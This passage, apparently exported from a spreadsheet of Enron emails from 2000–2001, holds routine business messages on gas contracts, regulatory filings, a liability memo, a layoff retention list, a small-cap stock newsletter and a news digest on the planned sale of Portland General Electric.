Can you see if it is feasible to activate these two days in Sitara so that I _x000D_
can clear my exceptions for Volume Management?_x000D_
_x000D_
Thanks_x000D_
-Jackie-_x000D_
3-9497_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 05:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mday@gmssr.com', 'travis.mccullough@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com'})</t>
  </si>
  <si>
    <t>Filings</t>
  </si>
  <si>
    <t>There were 3 PUC filings mentioned in today's call: _x000D_
_x000D_
1) response to TURN_x000D_
2) response to PG&amp;E receivables issue_x000D_
3) response to PG&amp;E PX credit calculation filing_x000D_
_x000D_
Could Bob and I each ger  a copy of each for a quick review before filing?  _x000D_
Thanks.</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 17:17:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'investnewswire@utarget.sparklist.com'})</t>
  </si>
  <si>
    <t>Week In Review / Learncom Update / News Links</t>
  </si>
  <si>
    <t>INVESTNEWSWIRE WEEK IN REVIEW_x000D_
Week Ending June 8, 2001_x000D_
_x000D_
IN THIS ISSUE:_x000D_
* Company Highlight : Learncom, Inc.(OTCBB - LRCM)_x000D_
* This Week's Top 10 News Links_x000D_
_x000D_
COMPANY SPOTLIGHT : Learncom, Inc._x000D_
_x000D_
Lloyd Singer, President and CEO of Learncom_x000D_
(OTCBB: LRCM - news) in an open letter to_x000D_
shareholders provided the following recap of its_x000D_
strategy and progress since the company started its_x000D_
business in January, 1999:_x000D_
_x000D_
Said Singer: "Our goal is to become the major_x000D_
supplier of soft skills training resources and_x000D_
related services in the highly fractionated $60_x000D_
billion training industry. From humble beginnings,_x000D_
with just twelve employees - all shareholders or option_x000D_
holders - housed in our warehouse in Bensenville,_x000D_
Illinois, we've been successful in acquiring four_x000D_
synergistic product-centric businesses with copyright_x000D_
or distribution rights to several thousand training_x000D_
videos, CD-ROMs and e-learning courses. Two other_x000D_
acquisitions are anticipated for 2001._x000D_
_x000D_
The same low overhead, flat organization approach to_x000D_
the business that we started with has been a cornerstone_x000D_
of our corporate culture. Build the salespower. Encourage_x000D_
cross-selling. Reduce the redundant overheads inherent in_x000D_
an acquisition strategy. Everybody an owner._x000D_
_x000D_
The first acquisition in January, 1999 included the high_x000D_
quality video assets (several hundred titles) of_x000D_
WingsNet, Inc. and provided the foundation to get the_x000D_
business started. By midyear, '99 we were cash neutral_x000D_
on just $750,000 in sales and provided our backers with_x000D_
the confidence to fund further growth._x000D_
_x000D_
In August, 1999, we acquired the stock of BNA_x000D_
Communications, a 50 year producer/distributor of_x000D_
high quality video courseware specializing in harassment_x000D_
prevention, diversity and employment law. The company_x000D_
had been a subsidiary of The Bureau of National Affairs,_x000D_
the large Washington, D.C. publisher and information_x000D_
provider to the legal and HR professions._x000D_
_x000D_
The business also included a start-up consulting_x000D_
practice in the same subject areas. The top ten video_x000D_
courses all had generated sales in excess of $2 million_x000D_
in revenue - a very strong result in our business. As_x000D_
announced a few weeks ago, we're now preparing_x000D_
the release of A WINNING BALANCE II, the_x000D_
sequel to the title of the same name which has generated_x000D_
revenues of over $5 million and is believed to be the_x000D_
best selling diversity course in history. These courses_x000D_
have been produced by ProGroup, Inc. a leading_x000D_
consulting company in the diversity area._x000D_
_x000D_
Another major change we've made with the BNAC_x000D_
business model is the sales approach. For years,_x000D_
BNAC had rejected the ``open'' sales model used in the_x000D_
training business. In this model, titles are sold by_x000D_
the producer's own sales staff as well as through other_x000D_
distributors. LearnCom has just signed a_x000D_
non-exclusive deal with a small, but highly_x000D_
productive distributor to sell BNAC best-sellers._x000D_
In addition, LearnCom's other sales units will be_x000D_
selling BNAC courses. Ultimately we expect to roll_x000D_
out the product to more than 200 distributors with_x000D_
300 salespeople. Early results are encouraging from_x000D_
these decisions.._x000D_
_x000D_
In January, 2001, we acquired the stock of venerable_x000D_
distributor, VideoLearning Systems, Inc. (VLS)._x000D_
This deal provided an additional eight salespeople,_x000D_
and three excellent managers. Integration is proceeding_x000D_
on schedule. VLS is on track to generate $2.5 million_x000D_
in revenue in 2001._x000D_
_x000D_
In March, we announced "agreement in principle" to_x000D_
acquire the trainseek.com website, www.trainseek.com._x000D_
This huge B2B site, which provides access to over_x000D_
one million training titles across the broad spectrum_x000D_
of platforms and formats is expected to become_x000D_
the main marketing engine for the company. With_x000D_
over 19,000 visitors monthly and its large_x000D_
e-mail list, we can now sell the largest product_x000D_
line ever assembled in the training industry to the_x000D_
largest potential customer base. TrainSeek, Inc._x000D_
had invested over $7 million in developing the site_x000D_
and establishing the brand. This deal is_x000D_
expected to close in early July._x000D_
_x000D_
Next up for 2001 is a distribution deal that has the_x000D_
potential to double our size to the $11million level._x000D_
More importantly, on a proforma basis, we'll have the_x000D_
scale to break into the black...a key goal for management_x000D_
since we opened our doors in that warehouse just 30_x000D_
months ago. Last week, we announced the $4 million_x000D_
fund-raising that will facilitate closing of the new_x000D_
transaction as well as providing capital for additional_x000D_
transactions and working capital for sales, marketing_x000D_
and product development._x000D_
_x000D_
I'm pleased but not complacent with our progress._x000D_
This is all about dedicated people, all owners or_x000D_
owners-to-be working to serve thousands of customers_x000D_
with an outstanding lineup of training products and_x000D_
services that enhance employee performance in thousands_x000D_
of companies. This is also about stockholders who_x000D_
continue to have faith in our Vision and Growth."_x000D_
_x000D_
ABOUT LEARNCOM, INC._x000D_
_x000D_
LearnCom, Inc.'s four Business Units provide_x000D_
single-source learning resources and consulting services_x000D_
to businesses, government agencies and other non-profit_x000D_
organizations. The Company focuses on human resources,_x000D_
management and safety training - specializing in_x000D_
diversity and critical compliance areas including_x000D_
harassment prevention, employment law and OSHA-required_x000D_
training. LearnCom's resources are provided in a variety_x000D_
of formats including Internet and Intranet delivery, video_x000D_
and CD-ROM. For additional information, visit_x000D_
www.learncom.com, www.videolrn.com and www.trainseek.com._x000D_
_x000D_
NEWS LINKS - THIS WEEK'S SMALL-CAP HIGHLIGHTS_x000D_
_x000D_
Fonix Selected in Compaq's TrailBlazer Program for Further_x000D_
Integration Of FAAST Framework_x000D_
http://www.investnewswire.com/articles.php?entryID2=422_x000D_
_x000D_
Unigene Successfully Delivers Oral Insulin_x000D_
http://www.investnewswire.com/articles.php?entryID2=423_x000D_
_x000D_
eNetpc, Inc. Increases Fiscal Year 2001 Revenue 303% Over_x000D_
Previous Year_x000D_
http://www.investnewswire.com/articles.php?entryID2=420_x000D_
_x000D_
eAutoclaims Announces $2.4 Million Contract With Commerce_x000D_
West Insurance Company_x000D_
http://www.investnewswire.com/articles.php?entryID2=421_x000D_
_x000D_
PC World Ranks travelbyus Web Site at Top_x000D_
http://www.investnewswire.com/articles.php?entryID2=415_x000D_
_x000D_
Maxxon Announces Delivery of Two Injection Molded Parts_x000D_
for Its Safety Syringe_x000D_
http://www.investnewswire.com/articles.php?entryID2=414_x000D_
_x000D_
EClickMD, Inc. and X10NET Announce Intent to Form_x000D_
Channel Partnership_x000D_
http://www.investnewswire.com/articles.php?entryID2=419_x000D_
_x000D_
FastComm Communications and Teleprime Inc. Announce_x000D_
Global Channel Partner and Support Agreement_x000D_
http://www.investnewswire.com/articles.php?entryID2=416_x000D_
_x000D_
Cyber Digital, Inc. Signs an Agreement with Omomia_x000D_
Associates of Nigeria_x000D_
http://www.investnewswire.com/articles.php?entryID2=417_x000D_
_x000D_
Ravenwood Resources Inc: Record Quarterly Results_x000D_
http://www.investnewswire.com/articles.php?entryID2=413_x000D_
_x000D_
DISCLAIMER: This is a free publication provided to the_x000D_
subscribers of InvestNewswire. The words contained within_x000D_
this email are those of the noted contributors, and not_x000D_
those of InvestNewswire. This publication shall not_x000D_
constitute an offer to sell or the solicitation of an_x000D_
offer to buy. Please check with your broker or with the_x000D_
companies mentioned to determine whether the securities_x000D_
of said companies may be purchased or sold in your state_x000D_
of residence prior to effecting a transaction._x000D_
---_x000D_
You are currently subscribed to investnewswire as: alewis@ect.enron.com_x000D_
To unsubscribe send a blank email to leave-investnewswire-36864D@utarget.sparklist.com</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 15:56:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nyiso@nyiso.com'})</t>
  </si>
  <si>
    <t>RE: Validated Bid-Winter 2001-2002 November Monthly Auction</t>
  </si>
  <si>
    <t>Can you change my e-mail address to richard.ring@enron.com as in the very near future Enron will stop supporting the current e-mail address._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Richard Ring_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: ICAP_Buyers/NYISO@nyiso.com [mailto:ICAP_Buyers/NYISO@nyiso.com]_x000D_
Sent: Thursday, October 18, 2001 4:13 PM_x000D_
To: Padron, Juan; rring@enron.com_x000D_
Subject: Validated Bid-Winter 2001-2002 November Monthly Auction_x000D_
_x000D_
_x000D_
Your bid to purchase UCAP in the Winter 2001-2002 November Monthly Auction_x000D_
has been validated.</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 03:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Project X Due Diligence</t>
  </si>
  <si>
    <t xml:space="preserve">please print_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 12/05/2000 _x000D_
11:18 AM ---------------------------_x000D_
_x000D_
_x000D_
Paul Quilkey@ENRON_DEVELOPMENT_x000D_
12/05/2000 03:43 AM_x000D_
To: Jeffrey A Shankman@ECT, Gary Hickerson@ECT_x000D_
cc: Stinson Gibner@ECT, John Norden@ECT _x000D_
Subject: Project X Due Diligence_x000D_
_x000D_
Gentlemen_x000D_
Attached are two separate documents from John Norden and Stinson Gibner _x000D_
providing summary findings regarding Project X Due Diligence._x000D_
We have indicated to X Bank that we will revert with our position by COB _x000D_
Thursday Houston time._x000D_
Suggest we arrange a conference call at your earliest convenience._x000D_
Paul_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 08:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lindy.donoho@enron.com', 'lorraine.lindberg@enron.com'})</t>
  </si>
  <si>
    <t>Confidential: PG&amp;E/Topock issue</t>
  </si>
  <si>
    <t>As you know, current firm contracts on Transwestern provide for delivery of _x000D_
250 MMcf/d of gas to Topock.  In the context of the Gallup Expansion, _x000D_
Transwestern has entered into firm contracts for an additional 40 MMcf/d to _x000D_
Topock.  Once the Gallup expansion is built, Transwestern will have a total _x000D_
of 290 MMcf/d of firm capacity under contract to the Topock delivery point:  _x000D_
40 MMcf/d more than PG&amp;E has agreed to accept while PCBs continue to be _x000D_
present._x000D_
_x000D_
Bill Cordes has asked what Transwestern's potential liability to shippers _x000D_
would be if PG&amp;E's refusal to accept deliveries due to the continued presence _x000D_
of contaminants causes Transwestern to have to curtail firm service at _x000D_
PG&amp;E/Topock.  The legal answer is that Transwestern's tariff provides for a _x000D_
reservation charge refund but does not limit the damages that could be sought _x000D_
by a shipper.  _x000D_
_x000D_
More specifically, Rate Schedule FTS-1 specifically provides for a _x000D_
reservation charge refund if Transwestern fails to deliver gas for a firm _x000D_
shipper.  In December, January, February, July and August, the shipper is _x000D_
entitled to a reservation charge refund for all nominated and confirmed _x000D_
quantities not delivered.  In all other months, the shipper is entitled to a _x000D_
refund only if deliveries fall below 75% of nominated/confirmed quantities _x000D_
for a period of 75 consecutive days. The tariff does not preclude a shipper _x000D_
from seeking other damages resulting from Transwestern's failure to provide _x000D_
service under an FTS-1 contract.  A shipper whose firm service is curtailed _x000D_
would likely incur damages in addition to the reservation charge, including, _x000D_
for example, the cost of buying spot gas or damages resulting from the _x000D_
shipper's inability to fulfill contractual obligations. Such damages could be _x000D_
recovered in a breach of contract action.  Not all shippers would incur such _x000D_
damages because some might be willing to take delivery of gas at alternate _x000D_
points if capacity is available at such points._x000D_
_x000D_
Bill has asked Steve to work with me in quantifying our potential exposure.  _x000D_
I could really use your help in putting a dollar amount on potential _x000D_
damages.  Can we meet briefly to discuss this?  I'm available after the _x000D_
Gallup meeting tomorrow a.m., or after lunch on Friday...or we can discuss a _x000D_
meeting time for next week.  Thank you.</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Royster - Clark, Inc</t>
  </si>
  <si>
    <t>Dan,_x000D_
_x000D_
As discussed, please find below details of Phy Gas deal:_x000D_
_x000D_
Deal Date: 3/22/01_x000D_
Deal No: QY6327 / 687279_x000D_
Buyer: Royster - Clark, Inc_x000D_
Seller: ENA_x000D_
Start Date: 4/1/01_x000D_
End Date: 3/31/06_x000D_
Firm_x000D_
Volume: 2,800 / day_x000D_
Price: NOVA.AECO-C-US. CGPR. M.I. plus USD 0.4875_x000D_
Delivery Point: Northern Natural Gas Company - Ventura_x000D_
_x000D_
Please let me know if you need any more details._x000D_
_x000D_
Thanks,_x000D_
Ellen_x000D_
x54099</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 05:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: oops</t>
  </si>
  <si>
    <t xml:space="preserve">Let's let her float in that vision for a while..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cindy White" &lt;cwhite@viviance.com&gt; on 08/25/2000 12:30:04 PM_x000D_
To: "Sally" &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: oops_x000D_
_x000D_
_x000D_
Dates:  I think Brigeda probably gets out a week later than your_x000D_
girls--don't mind pulling her out early is that will work best._x000D_
_x000D_
Cara and Chris have a wedding to attend on St. John's in June.  She thinks_x000D_
she, Chris and baby will go.  Shall we give her that reality check now or_x000D_
later?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2001 14:03:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'macminnr@uts.cc.utexas.edu'})</t>
  </si>
  <si>
    <t>RE: Enron chair at Rice</t>
  </si>
  <si>
    <t xml:space="preserve">Richard,_x000D_
_x000D_
It's nice to hear for you. I know many people at Rice, including the Dean of the Business School,_x000D_
and I can make discreet inquiries on your behalf. Please, let me know if I can_x000D_
approach the Dean or one of the finance faculty members on your behalf._x000D_
_x000D_
Vince _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Richard MacMinn" &lt;macminnr@uts.cc.utexas.edu&gt;@ENRON [mailto:IMCEANOTES-+22Richard+20MacMinn+22+20+3Cmacminnr+40uts+2Ecc+2Eutexas+2Eedu+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 23, 2001 2:39 PM_x000D_
To:	vkamins@ect.enron.com_x000D_
Subject:	Enron chair at Rice_x000D_
_x000D_
Dear Vince_x000D_
_x000D_
I recently saw an announcement of Enron's risk management chair at Rice_x000D_
University.  Do you know about it or the people at Rice?  While I'm having a_x000D_
great time working with Swiss Re here, I am thinking about coming home for_x000D_
my wife's sake.  Do you think that Rice would be open to a person in risk_x000D_
management with an insurance as well as a finance background?  That was_x000D_
certainly not true at Texas and that's why I'm asking._x000D_
_x000D_
I hope all is well there with you.  I did appreciate your presentation to my_x000D_
finance classes there at the University of Texas a couple of years ago.  I_x000D_
also appreciated the assistance that you recently gave one of my Texas Ph._x000D_
D. students.  He was and I still am working on pricing weather derivatives._x000D_
_x000D_
Best regards_x000D_
Richard_x000D_
_x000D_
Professor Richard MacMinn, Editor_x000D_
The Journal of Risk and Insurance_x000D_
The Swiss Re Chair in the Management of Risk_x000D_
Centre for Risk and Insurance Studies_x000D_
Nottingham University Business School_x000D_
Jubilee Campus, Wollaton Road_x000D_
Nottingham, NG8 1BB_x000D_
United Kingdom_x000D_
_x000D_
JRI Office: +1 512 471-0018_x000D_
Nottingham Office: +44 115 846-6679_x000D_
eFax: +1 305 768-0522_x000D_
Nottingham eFax: +44 870 134-0932_x000D_
_x000D_
Journal: mailto:jri1@uts.cc.utexas.edu_x000D_
Editor:  mailto:macminnr@uts.cc.utexas.edu_x000D_
Other: mailto:richard.macminn@nottingham.ac.uk_x000D_
_x000D_
Journal of Risk and Insurance: http://www.aria.org/jri/jri.asp_x000D_
Vita: http://www.aria.org/macminn/_x000D_
_x000D_
The only thing necessary for the triumph of evil is for good men to do_x000D_
nothing. Edmund Burke_x000D_
_x000D_
_x000D_
_x000D_
 - winmail.dat &lt;&lt; File: winmail.dat &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 10 Jan 2000 12:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nbartlo@columbiaenergygroup.com', 'pdrexel@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>CGAS k#62039</t>
  </si>
  <si>
    <t>Contract 62039 was replace with contract 65402.  It's 20,000 day with a _x000D_
primary receipt of Maumee and a primary delivery of COH.  The term is 11/1/99 _x000D_
- 10/31/2000.  Should I bill the retail group for this contract or does this _x000D_
belong to wholesale??  Also, I'm showing a demand charge of $.15.</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 14:27:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott.tholan@enron.com'})</t>
  </si>
  <si>
    <t>Competitive Analysis Retention List: 11/21</t>
  </si>
  <si>
    <t xml:space="preserve">John and Louise,_x000D_
To minimize confusion, these are the individuals that I have earmarked for RETENTION in my group:_x000D_
_x000D_
A. ENA_x000D_
1. Tholan, Scott_x000D_
2. Johnston, Robert_x000D_
3. Landry, Kimberly_x000D_
4. Walsh, Kristin_x000D_
5.  Purswell, Sharon (Admin Assistant.  ADDED her for help in group layoffs and ongoing billing)_x000D_
6.  Schlesinger, Judy  (eSource/Research) _x000D_
_x000D_
B. The "TAC Group" (to be settled separately)_x000D_
1.  Clark, Chris_x000D_
2.  Mihura, Brian_x000D_
3.  Sugiura, Junichi_x000D_
4.  Loup, Jason_x000D_
5.  Boehm, Richard_x000D_
6.  Orbeck, Dan_x000D_
7.  Chancey, Donald_x000D_
8.  Kooser, Kenneth_x000D_
9.  Wingo, Angie_x000D_
(Also, two temporary workers are being retained)  _x000D_
_x000D_
C. EES_x000D_
1. Golden, Kevin_x000D_
_x000D_
D. EGM ("Future Termination" Status, 30-90 days, to support Oil trading) _x000D_
1.  Seigle, Clayton_x000D_
_x000D_
E.  FALLON (Jim is retaining this guy for himself for his use in the layoffs)_x000D_
1. McGuinness, Francis_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 05:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Happy Birthday!</t>
  </si>
  <si>
    <t>its all good</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 11:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Correction -  Floor Meeting @ 12:15</t>
  </si>
  <si>
    <t>The government affairs seminar will run until about 12:10.  Therefore, we will have the floor meeting at 12:15._x000D_
_x000D_
Tim</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 07:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Credit Lawyer responsibilities</t>
  </si>
  <si>
    <t xml:space="preserve">Here's a draft of the bullet points you requested:_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Feb 2000 02:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.moscoso@enron.com', 'sheila.glover@enron.com', 'scott.earnest@enron.com'})</t>
  </si>
  <si>
    <t>FAS 133 Offsite</t>
  </si>
  <si>
    <t xml:space="preserve">Another FAS 133 Offsite meeting has been scheduled for Tuesday, Feb 29 (all _x000D_
day).  Sally asked me to forward this to you - would like you to attend if at _x000D_
all possible.  Scott, this is an FYI for you - I know you will be overseas on _x000D_
this date._x000D_
_x000D_
Patti  _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 02/18/2000 09:53 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
	Bob Butts @ ENRON_x000D_
	02/16/2000 05:31 PM_x000D_
	_x000D_
Sent by: Dortha Gray@ENRON_x000D_
To: Wes Colwell/HOU/ECT@ECT, Paige B Grumulaitis/HOU/ECT@ECT, Ron _x000D_
Baker/Corp/Enron@ENRON, Roger G Leworthy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
James J Brown/AA/Corp/Enron@Enron, Patty Grutzmacher/AA/Corp/Enron@Enron, _x000D_
Kimberly Scardino/AA/Corp/Enron@Enron, Sally Beck/HOU/ECT@ECT, Melissa _x000D_
Becker/Corp/Enron@ENRON, Kent Castleman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Wanda Curry/HOU/ECT@ECT, Fernley Dyson/LON/ECT@ECT, John B _x000D_
Echols/HOU/EES@EES, Rodney Faldyn/HOU/AZURIX@AZURIX, Rod _x000D_
Hayslett/FGT/Enron@ENRON, Robert Hermann/Corp/Enron@ENRON, Tod Lindholm/Enron _x000D_
Communications@Enron Communications, Mark E Lindsey/GPGFIN/Enron@ENRON, Keith _x000D_
Marlow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cassandra _x000D_
Schultz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jeffrey E _x000D_
Sommers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, P _x000D_
Sreekumar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Shirley Tijerina/Corp/Enron@ENRON, Donna Jones/HOU/ECT@ECT, Margarite _x000D_
Cunningham/Corp/Enron@ENRON, Linda Hawkins/Corp/Enron@ENRON, Carmella _x000D_
Jones/HOU/ECT@ECT, Nicole Scott/LON/ECT@ECT, Melinda McCarty/HOU/EES@EES, _x000D_
Shelley Grover/HOU/AZURIX@AZURIX, Kathy Campos/GPGFIN/Enron@ENRON, Bobbie _x000D_
Moody/Corp/Enron@ENRON, Sandy Lewelling/Enron Communications@Enron _x000D_
Communications, Karen Myer/GPGFIN/Enron@ENRON, Norma _x000D_
Petry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Araceli _x000D_
Romero/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Leigh Ann Van _x000D_
Houten/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: FAS 133 Offsite_x000D_
_x000D_
Please see attached memo._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 10:49:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: PRC Reviews</t>
  </si>
  <si>
    <t xml:space="preserve">YES_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Tycholiz, Barry  _x000D_
Sent:	Monday, May 21, 2001 11:00 AM_x000D_
To:	Lavorato, John_x000D_
Subject:	PRC Reviews_x000D_
_x000D_
John, did I understand you correctly... are we going to review Analysts and Assoc's in our commercial PRC review process on July 9?  </t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 05:57:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>Northwest Natural In Talks With Enron Over Portland Utility_x000D_
The Wall Street Journal, 10/05/01_x000D_
_x000D_
NW NATURAL CONFIRMS TALKS REGARDING PORTLAND GENERAL ELECTRIC_x000D_
PR Newswire, 10/05/01_x000D_
_x000D_
Enron in Talks to Sell Oregon Utility to Northwest Natural Gas_x000D_
Bloomberg, 10/05/01_x000D_
_x000D_
UK: Enron in talks to sell Portland to Northwest-WSJ._x000D_
Reuters English News Service, 10/05/01_x000D_
Enron in talks to sell Portland General to Northwest Natural - report_x000D_
AFX News, 10/05/01_x000D_
Enron Considers Selling Utility Unit to Northwest Natural for $1.8 Billion_x000D_
Dow Jones Business News, 10/05/01_x000D_
Enron May Sell Portland for $2.8 Billion, WSJ Says (Update3)_x000D_
Bloomberg, 10/05/01_x000D_
_x000D_
USA: Northwest Natural increases quarterly common div._x000D_
Reuters English News Service, 10/05/01_x000D_
Enron to eliminate 500 jobs in Europe_x000D_
Houston Chronicle, 10/05/01_x000D_
UK's BG Says Purchase Of Enron India Assets In Jeopardy_x000D_
Dow Jones International News, 10/05/01_x000D_
INDIA PRESS: Enron Offshore Field Sale To BG May Fail_x000D_
Dow Jones Energy Service, 10/05/01_x000D_
British Gas unlikely to get operatorship_x000D_
Financial Express, 10/05/01_x000D_
INDIA: India Tata to finalise Enron bid in 3 wks - papers._x000D_
Reuters English News Service, 10/05/01_x000D_
INDIA PRESS: BSES Won't Buy Enron's Stake In Dabhol_x000D_
Dow Jones International News, 10/05/01_x000D_
Tata Power seeks 3 weeks to firm up Dabhol offer_x000D_
Business Standard, 10/05/01_x000D_
Tata Power, Enron set for time-bound talks on DPC stake sale_x000D_
Financial Express, 10/05/01_x000D_
Moody's Modi on Tata Power Plan to Buy Enron Unit: Comment_x000D_
Bloomberg, 10/05/01_x000D_
_x000D_
UK: Enron to cut up to 10 pct of European workers-WSJ._x000D_
Reuters English News Service, 10/04/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Northwest Natural In Talks With Enron Over Portland Utility_x000D_
By Wall Street Journal staff reporters Robin Sidel, Rebecca Smith and Nikhil Deogun_x000D_
_x000D_
10/05/2001_x000D_
The Wall Street Journal_x000D_
B2_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
Enron Corp. is in advanced discussions to sell its Portland General Electric utility unit to Northwest Natural Gas Co. for about $1.8 billion in cash and stock in a highly leveraged transaction that would eventually give Enron a minority stake in Northwest, according to people familiar with the matter. _x000D_
The discussions are at a very delicate stage, and some important points need to be finalized, these people caution. The current environment could also make financing such a transaction quite difficult, and board approval isn't a certainty. However, should the two sides agree to terms, a deal could be announced in the next few days. Northwest Natural is also expected to assume roughly $1 billion in debt._x000D_
Enron and Northwest Natural declined to comment. _x000D_
If a transaction is consummated, it would come nearly six months after the collapse of Enron's agreement to sell the utility to Sierra Pacific Resources. That transaction fell apart in part because of the California energy crisis. _x000D_
A purchase of Portland General would be a very big bite for Northwest Natural, which has a market capitalization of just $650 million and supplies natural gas to more than 500,000 residential and business customers in Oregon and Vancouver, Wash. Portland General is an electric utility serving more than 1.4 million customers in Oregon. _x000D_
The deal would bring together two Oregon utilities whose executives and employees know each other well. Richard G. Reiten, Northwest's chairman and chief executive, was president and chief operating officer of Portland General between 1989 and 1996, and also served on its board. _x000D_
By buying a utility, Northwest would hope to have more bargaining power in its gas purchases, enabling it to buy more product and store it when prices are cheap. A deal would be accretive to Northwest's earnings, people familiar with the matter say. And the financial risk for Northwest Natural is somewhat muted because Enron is helping to facilitate and finance the transaction by agreeing to take common stock and convertible preferred stock in Northwest Natural in addition to cash. Northwest Natural would finance the transaction with debt and equity offerings. _x000D_
Shares of Northwest Natural were trading up $1.04 at $25.99 in 4 p.m. composite trading on the New York Stock Exchange, while Enron stock was down 39 cents a share at $33.10. _x000D_
For Enron, a deal with Northwest Natural would be the latest twist in a five-year ordeal that was supposed to help the nation's biggest energy trader break into California's deregulating electricity market. But the utility business proved less valuable than anticipated when Enron was prevented from selling off utility contracts that enabled it to buy electricity cheaply. And California's market developed serious problems last year that made it a less attractive place for Enron to do business. _x000D_
Enron, which also owns a major gas-transmission pipeline system, has a history of buying assets and businesses, learning what it can from them, and then selling off the bulk of physical assets so it can reinvest capital elsewhere. _x000D_
It isn't clear where Enron will put the capital to work that it garners from the sale. Its broadband telecommunications business is in the doldrums and it recently said it would invest $250 million in it this year, down from a formerly projected $750 million._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
NW NATURAL CONFIRMS TALKS REGARDING PORTLAND GENERAL ELECTRIC_x000D_
2001-10-05 08:39 (New York)_x000D_
_x000D_
_x000D_
(The following is a reformatted version of a press release issued by NW Natural_x000D_
and received via fax. The release was confirmed by the sender.)_x000D_
_x000D_
October 5, 2001_x000D_
_x000D_
NW NATURAL CONFIRMS DISCUSSIONS REGARDING PORTLAND GENERAL ELECTRIC_x000D_
_x000D_
PORTLAND, Ore. - Northwest Natural Gas Company (NYSE: NWN) ("NW Natural"), in_x000D_
response to press reports, today confirmed that it is engaged in discussions_x000D_
with Enron Corp. (NYSE: ENE) regarding a potential acquisition by NW Natural of_x000D_
Enron's wholly-owned subsidiary, Portland General Electric Company (PGE). There_x000D_
can be no assurances that any transaction will result from these discussions,_x000D_
NW Natural does not intend to make any additional comments regarding this matter_x000D_
unless and until a formal agreement has been reached._x000D_
_x000D_
_x000D_
_x000D_
Enron in Talks to Sell Oregon Utility to Northwest Natural Gas_x000D_
2001-10-05 08:37 (New York)_x000D_
_x000D_
_x000D_
     Houston, Oct. 5 (Bloomberg) -- Enron Corp., the largest_x000D_
energy trader, is in talks to sell its Portland General Electric_x000D_
utility to Northwest Natural Gas Co., more than five months after_x000D_
a planned sale to Sierra Pacific Resources collapsed._x000D_
_x000D_
     Northwest didn't give a price in a faxed statement. The Wall_x000D_
Street Journal put the potential price at $2.8 billion in cash,_x000D_
stock and assumed debt, citing unidentified people familiar with_x000D_
the matter. Enron spokesman Mark Palmer declined to comment._x000D_
_x000D_
_x000D_
UK: Enron in talks to sell Portland to Northwest-WSJ._x000D_
_x000D_
10/05/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
LONDON, Oct 5 (Reuters) - U.S. energy group Enron Corp is in advanced talks to sell its Oregon-based Portland General utility to Northwest Natural Gas Co for $1.8 billion, the Wall Street Journal's online edition reported. _x000D_
Citing people familiar with the matter, it said talks were at a delicate stage and financing could be a problem for Northwest, which has a market value of only about $650 million._x000D_
But a deal could be announced in the next few days with Northwest assuming also some $1 billion of debt, it said. _x000D_
Earlier this year, Enron's plans to sell Portland to Sierra Pacific Resources Corp broke down amid the California power crisis. _x000D_
